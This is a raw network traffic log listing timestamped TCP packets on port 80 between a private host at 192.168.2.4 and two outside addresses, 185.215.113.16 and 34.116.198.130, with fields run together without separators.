                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.507441044 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.508210897 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.508222103 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.508265018 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.508547068 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.508595943 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.508738995 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.508783102 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.509763002 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.509807110 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.509954929 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.509998083 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.510864019 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.510920048 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.511008978 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.511050940 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.512160063 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.512172937 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.512200117 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.512216091 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.513209105 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.513221979 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.513252974 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.513267994 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.514744043 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.514791012 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.514887094 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.514935970 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.516149998 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.516163111 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.516192913 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.516210079 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.516726971 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.516769886 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.516907930 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.516947985 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.517985106 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.518035889 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.518124104 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.518162966 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.519224882 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.519234896 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.519263983 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.519289970 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.520361900 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.520405054 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.520543098 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.520584106 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.521512032 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.521567106 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.521699905 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.521742105 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.522874117 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.522886038 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.522922993 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.523992062 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.524032116 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.524169922 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.524209976 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.525090933 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.525129080 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.525432110 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.525477886 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.525903940 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.525947094 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.526097059 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.526145935 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.526720047 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.526732922 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.526773930 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.527256012 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.527297974 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.527430058 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.527473927 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.528505087 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.528548002 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.528614044 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.528656960 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.529603958 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.529645920 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.529704094 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.529753923 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.530776024 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.530818939 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.530971050 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.531014919 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.535561085 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.535572052 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.535581112 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.535593987 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.535609007 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.535634995 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.535677910 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.535720110 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.535859108 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.535898924 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.536214113 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.536225080 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.536253929 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.536269903 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.536771059 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.536812067 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.536850929 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.536889076 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.538002968 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.538049936 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.538137913 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.538178921 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.539094925 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.539140940 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.539215088 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.539259911 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.540272951 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.540319920 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.540365934 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.540410995 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.541503906 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.541538954 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.541609049 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.541651964 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.542746067 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.542784929 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.542938948 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.542977095 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.543802023 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.543844938 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.543905973 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.543948889 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.554239988 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.630275011 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.630367041 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.630409956 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.630995989 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.631061077 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.631110907 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.632457018 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.632580042 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.632623911 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.633891106 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.633905888 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.633940935 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.635401011 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.635474920 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.635509968 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.636887074 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.636965036 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.636996031 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.638369083 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.638523102 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.638557911 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.639695883 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.639823914 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.639866114 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.641179085 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.641289949 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.641324043 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.642618895 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.642705917 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.642743111 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.644083977 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.644164085 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.644193888 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.645512104 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.645606041 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.645639896 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.646975994 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.647110939 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.647149086 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.648439884 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.648603916 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.648641109 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.649897099 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.649966002 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.649996996 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.651165962 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.651212931 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.651216984 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.651246071 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.651345968 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.651458979 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.651495934 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.651779890 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.651825905 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.651896000 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.651945114 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.652834892 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.652873039 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.652904987 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.652972937 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.652983904 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.653023958 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.654126883 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.654169083 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.654262066 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.654300928 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.654333115 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.655775070 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.655859947 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.655890942 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.657155037 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.657263041 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.657299042 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.658682108 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.658860922 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.658895969 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.660129070 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.660208941 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.660238981 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.661547899 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.661691904 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.661726952 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.662996054 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.663136005 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.663172007 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.664436102 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.664565086 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.664596081 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.665899992 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.665988922 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.666022062 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.667352915 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.667438984 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.667478085 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.668801069 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.668931961 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.668967009 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.670264959 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.670391083 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.670434952 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.671926022 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.671962976 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.672002077 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.673183918 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.673300028 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.673332930 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.674664974 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.674766064 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.674802065 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.676085949 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.676156044 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.676192999 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.677656889 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.677788019 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.677820921 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.678999901 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.679177046 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.679239988 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.680469990 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.680610895 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.680645943 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.681929111 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.682046890 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.682082891 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.683370113 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.683559895 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.683597088 CET4980380192.168.2.434.116.198.130
